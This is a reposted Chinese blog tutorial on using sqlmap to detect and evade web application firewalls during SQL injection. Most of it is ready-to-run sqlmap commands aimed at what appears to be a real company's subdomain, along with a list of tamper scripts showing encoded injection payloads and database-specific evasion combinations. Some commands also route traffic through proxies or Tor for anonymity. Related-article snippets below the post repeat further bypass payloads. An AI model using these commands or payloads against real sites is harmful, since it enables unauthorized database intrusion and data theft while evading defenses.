【SQL注入/WAF】使用sqlmap 绕过防火墙进行注入测试

最新推荐文章于 2024-07-30 10:50:29 发布
最新推荐文章于 2024-07-30 10:50:29 发布
阅读量1.8k 收藏 9
点赞数
分类专栏: ctf 文章标签: SQL注入/WAF sqlmap  sqlmap绕过防火墙 注入测试

转载自:https://blog.csdn.net/qq_35420342/article/details/79951355

0x00 前言 

现在的网络环境往往是WAF/IPS/IDS保护着Web 服务器等等,这种保护措施往往会过滤挡住我们的SQL注入查询链接,甚至封锁我们的主机IP,所以这个时候,我们就要考虑怎样进行绕过,达到注入的目标。因为现在WAF/IPS/IDS都把sqlmap 列入黑名单了,呵呵!但是本文基于sqlmap 进行绕过注入测试,介绍至今仍然实用有效的技巧,以下策略在特定的环境能够成功绕过,具体是否绕过,请仔细查看输出的信息。


0x01 确认WAF 

首先我们判断该Web 服务器是否被WAF/IPS/IDS保护着。这点很容易实现,因为我们在漏扫或者使用专门工具来检测是否有WAF,这个检测,在nmap 的NSE,或者WVS的策略或者APPSCAN的策略中都有,我们可以利用这些来判断。在此我们,也介绍使用sqlmap 进行检测是否有WAF/IPS/IDS

 

[email protected]:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --thread 10 --identify-waf#首选

 

[email protected]:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --thread 10--check-waf#备选


0x02 使用参数进行绕过 

[email protected]:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4"--random-agent-v 2#使用任意浏览器进行绕过,尤其是在WAF配置不当的时候

 

[email protected]:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --hpp -v 3#使用HTTP 参数污染进行绕过,尤其是在ASP.NET/IIS 平台上

 

[email protected]:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4"--delay=3.5--time-sec=60#使用长的延时来避免触发WAF的机制,这方式比较耗时

 

[email protected]:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4"--proxy=211.211.211.211:8080 --proxy-cred=211:985#使用代理进行注入

 

[email protected]:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4"--ignore-proxy#禁止使用系统的代理,直接连接进行注入

 

[email protected]:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --flush-session#清空会话,重构注入

 

[email protected]:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --hex#或者使用参数 --no-cast ,进行字符码转换

 

[email protected]:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --mobile #对移动端的服务器进行注入

 

[email protected]:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4"--tor # 匿名注入


0x03 使用脚本介绍 
1 使用格式: 

[email protected]:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --tamper=A.py,B.py#脚本A,脚本B


2 脚本总类 

01 apostrophemask.py#用utf8代替引号;Example: ("1 AND '1'='1") '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'

 

02equaltolike.py#MSSQL * SQLite中like 代替等号;Example: Input: SELECT * FROM users WHERE id=1 ;Output: SELECT * FROM users WHERE id LIKE 1

 

03greatest.py#MySQL中绕过过滤’>’ ,用GREATEST替换大于号;Example: ('1 AND A > B') '1 AND GREATEST(A,B+1)=A'

 

04 space2hash.py#空格替换为#号 随机字符串 以及换行符;Input: 1 AND 9227=9227;Output: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227

 

05apostrophenullencode.py#MySQL 4, 5.0 and 5.5,Oracle 10g,PostgreSQL绕过过滤双引号,替换字符和双引号;

 

06 halfversionedmorekeywords.py#当数据库为mysql时绕过防火墙,每个关键字之前添加mysql版本评论;

 

07space2morehash.py#MySQL中空格替换为 #号 以及更多随机字符串 换行符;

 

08appendnullbyte.py#Microsoft Access在有效负荷结束位置加载零字节字符编码;Example: ('1 AND 1=1') '1 AND 1=1%00'

 

09ifnull2ifisnull.py#MySQL,SQLite (possibly),SAP MaxDB绕过对 IFNULL 过滤。 替换类似’IFNULL(A, B)’为’IF(ISNULL(A), B, A)’

 

10space2mssqlblank.py(mssql)#mssql空格替换为其它空符号

 

11base64encode.py#用base64编码j Example: ("1' AND SLEEP(5)#") 'MScgQU5EIFNMRUVQKDUpIw==' Requirement: all

 

12space2mssqlhash.py#mssql查询中替换空格

 

13modsecurityversioned.py#(mysql中过滤空格,包含完整的查询版本注释;Example: ('1 AND 2>1--') '1 /*!30874AND 2>1*/--'

 

14space2mysqlblank.py#(mysql中空格替换其它空白符号

 

15between.py#MS SQL 2005,MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0中用between替换大于号(>)

 

16space2mysqldash.py#MySQL,MSSQL替换空格字符(”)(’ – ‘)后跟一个破折号注释一个新行(’ n’)

 

17multiplespaces.py#围绕SQL关键字添加多个空格;Example: ('1 UNION SELECT foobar') '1 UNION SELECT foobar'

 

18space2plus.py#用+替换空格;Example: ('SELECT id FROM users') 'SELECT+id+FROM+users'

 

19bluecoat.py#MySQL 5.1, SGOS代替空格字符后与一个有效的随机空白字符的SQL语句。 然后替换=为like

 

20nonrecursivereplacement.py#双重查询语句。取代predefined SQL关键字with表示 suitable for替代(例如 .replace(“SELECT”、””)) filters

 

21space2randomblank.py#代替空格字符(“”)从一个随机的空白字符可选字符的有效集

 

22sp_password.py#追加sp_password’从DBMS日志的自动模糊处理的26 有效载荷的末尾

 

23chardoubleencode.py#双url编码(不处理以编码的)

 

24unionalltounion.py#替换UNION ALL SELECT UNION SELECT;Example: ('-1 UNION ALL SELECT') '-1 UNION SELECT'

 

25charencode.py#Microsoft SQL Server 2005,MySQL 4, 5.0 and 5.5,Oracle 10g,PostgreSQL 8.3, 8.4, 9.0url编码;

 

26randomcase.py#Microsoft SQL Server 2005,MySQL 4, 5.0 and 5.5,Oracle 10g,PostgreSQL 8.3, 8.4, 9.0中随机大小写

 

27unmagicquotes.py#宽字符绕过 GPC addslashes;Example:* Input: 1′ AND 1=1* Output: 1%bf%27 AND 1=1–%20

 

28randomcomments.py#用/**/分割sql关键字;Example:‘INSERT’ becomes ‘IN//S//ERT’

 

29charunicodeencode.py#ASP,ASP.NET中字符串 unicode 编码;

 

30securesphere.py#追加特制的字符串;Example: ('1 AND 1=1') "1 AND 1=1 and '0having'='0having'"

 

31versionedmorekeywords.py#MySQL >= 5.1.13注释绕过

 

32space2comment.py#Replaces space character (‘ ‘) with comments ‘/**/’

 

33halfversionedmorekeywords.py#MySQL < 5.1中关键字前加注释

0x04脚本参数组合策略绕过 
1 mysql绕过: 

[email protected]:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4"--random-agent-v 2-delay=3.5 --tamper=space2hash.py,modsecurityversioned.py

 

[email protected]:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4"--random-agent--hpp --tamper=space2mysqldash.p,versionedmorekeywords.py

 

[email protected]:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" -delay=3.5 ----user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/38.0.696.12 Safari/534.24” --tamper=apostrophemask.py,equaltolike.py

 

备注:这些组合策略可以根据注入的反馈信息,及时调整组合策略


2 MSSQL: 

[email protected]:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" -delay=3.5 ----user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/38.0.696.12 Safari/534.24” --tamper=randomcase.py,charencode.py

 

[email protected]:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --delay=3.5 --hpp --tamper=space2comment.py,randomcase.py [email protected]:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --delay=3.5 --time-sec=120 --tamper=space2mssqlblank.py,securesphere.py

 

[email protected]:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --delay=3.5 --tamper=unionalltounion.py,base64encode.p


3 ms access: 

[email protected]:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --delay=3.5--random-agent--tamper=appendnullbyte.py,space2plus.py

 

[email protected]:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --delay=3.5--random-agent--hpp --tamper=chardoubleencode.py


4Oracle: 

[email protected]:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --delay=5--random-agent--hpp--tamper=unmagicquotes.py,unionalltounion.py

 

[email protected]:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --delay=5--user-agent =“Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0”--hpp--tamper=charunicodeencode.py,chardoubleencode.py


5 建议: 

因为WAF可能采用白名单规则,所以对于选择哪种策略,重点是根据-v 3 提示的信息进行判断,可以抓取主流的浏览器的user-agent ,s适当的延时,加上注入字符转换---大小写、空格、字符串、注释、加密等等方式

xuchen16
关注
  • 0
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
<小迪安全>19-SQL注入sqlmap绕过WAF
hackerXxxt的博客
03-17 854
1.白名单方式一:IP白奖单从网络层获取的ip,这种一般伪造不来,如果是获取客户端的IP,这样就可能存在伪造IP绕过的情况。测试方法:修改http的header来bypass wafx-Real-ip方式二:静态资源特定的静态资源后缀请求,常见的静态文件(.js .jpg .swf .css等等),类似白名单机制,waf为了检测效率,不去检测这样一些静态文件名后缀的请求。id=1id=1备注: Aspx/php只识别到前面的.aspx/.php后面基本不识别。
sqlmap绕过防火墙
weixin_42917890的博客
04-06 1295
0x00 前言    现在的网络环境往往是WAF/IPS/IDS保护着Web 服务器等等,这种保护措施往往会过滤挡住我们的SQL注入查询链接,甚至封锁我们的主机IP,所以这个时候,我们就要考虑怎样进行绕过,达到注入的目标。因为现在WAF/IPS/IDS都把sqlmap 列入黑名单了,呵呵!但是本文基于sqlmap 进行绕过注入测试,介绍至今仍然实用有效的技巧,以下策略在特定的环...
【转载】sqlmap tamper 绕过waf
weixin_30263277的博客
01-14 160
01. apostrophemask.py 用UTF-8全角字符替换单引号字符 02. apostrophenullencode.py 用非法双字节unicode字符替换单引号字符 03. appendnullbyte.py 在payload末尾添加空字符编码 04. base64encode.py 对给定的payload全部字符使用Base64编码 05. between.py 分...
WAF BYPASS】SQL注入漏洞之WAF绕过方式探索(万种)
最新发布
weixin_70940440的博客
07-30 1813
但这只是一种简单的防护措施。(注意:在 SQL 中,XOR(异或)运算符用于比较两个布尔表达式,如果两个表达式的结果不同(一个为真,一个为假),则XOR的结果为真;外部的查询SELECT * FROM users WHERE age > (子查询的结果) :从users表中选择所有年龄大于子查询计算出的平均年龄的记录,并返回所有列( * 表示所有列)。CHAR(101) 对应字符 'e',CHAR(97) 对应字符 'a',CHAR(115) 对应字符 's',CHAR(116) 对应字符 't'。
sqlmap注入之tamper绕过WAF防火墙过滤
热门推荐
ru_li的专栏
05-19 1万+
每当注入的时候看到这个贱贱的提示框,内心有千万只草泥马在奔腾。   但很多时候还是得静下来分析过滤系统到底过滤了哪些参数,该如何绕过sqlmap中的tamper给我们带来了很多防过滤的脚本,非常实用,可能有的朋友还不知道怎样才能最有效的利用tamper脚本。 当然使用脚本之前需要确定的就是系统过滤了哪些关键字,比如单引号、空格、select、union、admin等等。 所以
实战sqlmap绕过WAF
zkaqlaoniao的博客
10-26 3953
前言 随着最近几年安全行业的兴起,市场关注度的不断提升,安全防护的软件也在不断提升,不在是那个随便找一个站就能马上发现漏洞了,没有以前那么多所谓的“靶场”了,在这次的实战中遇到的SQL注入与其他的有点不一样,需要考虑的东西很多,写得不好的地方师傅们勿喷。 实战演示 通过前期的信息收集发现存在注入的页面如下: 直接使用sqlmap跑发现出现如下错误: python2 sqlmap.py -u "http://xxxx?&daxxtae=null&parame=xxxxx..
小迪安全学习笔记--第19天web漏洞-深入WAF注入绕过
zr1213159840的博客
12-22 1119
在攻防实战中,往往需要掌握一些特性,比如服务器、数据库、应用层、WAF层等,以便我们更灵活地去构造Pa9load,从而可以和各种WAF进行对抗,甚至绕过安全防御措施进行漏洞利用。 应用层 大小写/关键词替换 id=1 UnIoN/**/SeLeCT 1,user() Hex() bin() 等价于ascii() Sleep() 等价于benchmark() Mid() substring() 等价于substr() @@user() 等价于User() @@version 等价于version() 各种编
渗透测试必备神器SQLMAP的所有绕waf脚本合集
10-18
SQLMAP通过自动化的智能探测和多种技术,如盲注、时间延迟注入、错误注入等,来判断目标应用程序是否存在SQL注入漏洞,并且可以绕过WAF的检测。这些脚本是基于不同的数据库系统(如MySQL、PostgreSQL、Oracle等)的...
sqlmap中文手册-sql注入自动化测试工具
07-19
此外,SQLMap还具备绕过WAF(Web应用防火墙)的能力,提高了在复杂环境下的成功率。 在保持工具最新性方面,用户可以通过官方GitHub仓库获取最新版本,了解更新日志,确保使用的始终是最先进的工具。同时,社区的...
如何使用sqlmap绕过WAF进行SQL注入攻击
# 1. WAF(Web 应用程序防火墙)概述 ## 1.1 什么是WAF? Web 应用程序防火墙WAF)是一种网络安全设备,用于监控、过滤和阻止 HTTP/HTTPS 请求和响应。它的作用是保护 Web 应用...## 1.3 WAFSQL注入攻击的防御
WEB漏洞-SQL注入-利用SQLMAP工具绕过WAF
ran的博客
01-25 2967
此时可以在SQLMAP的命令里加入“--random-agent”参数,此参数的作用是使User-Agent后面的值按照其字典随机出现。因此就需要我们自己来写脚本,在自己写脚本的过程中可以参考“tamper”下的脚本,可以对里面的脚本进行修改。在漏洞防护规则里可以看到包含一种名为“工具拦截”的检测类型,当其发现是使用sqlmap工具时,就会进行拦截。但是这些默认的脚本必然是不能绕过我们现在常见的一些WAF的(可以绕过一些比赛的拦截规则,如CTF比赛等)。可以看到此时网站可以正常访问,可以进行正常注入
sql注入-08 sqlmap绕过waf
weixin_44576725的博客
11-17 3629
sqlmap绕过waf 1、绕过的方法–白名单 方式一:ip白名单 从网络层tcp、udp获取的ip,这种一般伪造不来。 如果是通过脚本获取客户端的IP,这样就可能存在伪造IP绕过的情况。 测试方法:修改http的header来bypass waf x-forwarded-for x-remote-IP x-originating-IP x-remote-addr x-Real-ip 方式二:静态资源 特定的静态资源后缀请求,常见的静态文件(.js .jpg .swf .css等等), 类似白名单
19、SQL注入SQLMAP绕过WAF
山兔的博客
08-14 2481
搜索引擎会对我们的网站进行爬取,因为它的收录就是对我们的网站采取爬虫技术,而且速度很快,也是符合拦截规则的,但是WAF却不会去拦截,因为WAF会去识别你这个是用户访问,还是搜索引擎爬取,所以我们可以通过数据包的伪造,伪造成搜索引擎,对目标的网站进行访问,这个时候waf肯定会放行,因为它觉得这个是搜索引擎的访问,是正常的、官方的一种收录行为,不会是用户的攻击行为。一个是获取IP是不是通过脚本去获取,如果是的话,可以去伪造IP,通过tcp/udp网络层方式获取的,那是没有办法伪造的。
WEB漏洞-SQL注入sqlmap绕过waf
xhscxj的博客
01-18 2863
静态资源 特定的静态资源后缀请求,常见的静态文件如(.js,.css,.jpg,.txt等),类似与白名单机制,waf为了检验的效率,不会去检验这样一些静态后缀名的请求 在网站目录后面加上x.txt,网站返回的数据不会受影响,这样waf就有可能不会去检查后面的参数,从而绕过。 爬虫白名单 当你去用工具扫描网站时访问的次数太频繁,如果网站waf设有流量资源防护,就会把你的ip列入黑名单。 但是为什么百度,谷歌等浏览器也属于爬虫,他们请求的时候不会被禁止访问 因为网站的waf设置了爬虫白名单,当它识别到use
WEB漏洞-SQL注入SQLMAP绕过WAF
硫酸超的博客
08-07 1588
WAF
第18、19天:WEB漏洞-WAF绕过注入以及SQLMAP绕过WAF
cailme的博客
05-18 1658
渗透测试day18、19天
第19天-WEB漏洞-SQL注入SQLMAP绕过WAF
MCTSOG的博客
03-03 1894
在攻防实战中,往往需要掌握一些特性,比如服务器、数据库、应用层、WAF 层等,以便我们更灵活地去构造 Payload,从而可以和各种WAF 进行对抗,甚至绕过安全防御措施进行漏洞利用。 数据库特性(补充) %23x%0aunion%23x%0Aselect%201,2,3 %20/!44509union/%23x%0aselect%201,2,3 id=1/**&id=-1%20union%20select%201,2,3%23*/ %20union%20all%23%0a%20select%20
SQLMAP绕过WAF小技巧
永远是少年
08-26 2349
今天继续给大家介绍渗透测试相关知识,本文主要内容是SQLMAP绕过WAF小技巧。 一、SQLMAP伪造IP白名单 二、SQLMAP伪造静态资源 三、SQLMAP伪造URL白名单 四、SQLMAP伪造User-Agent
Sqlmap 识别 WAF
andiao1218的博客
09-11 2557
命令: ┌─[root@sch01ar]─[~] └──╼ #sqlmap -u "http://www.sch01ar.com/" --identify-waf --batch 运行结果 如果使用WAF 没有什么特征,Sqlmap 识别出来的类型会是 Generic (Unknown) 在 Sqlmap 的安装目录下的 waf 目录中存放着相关的 waf ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值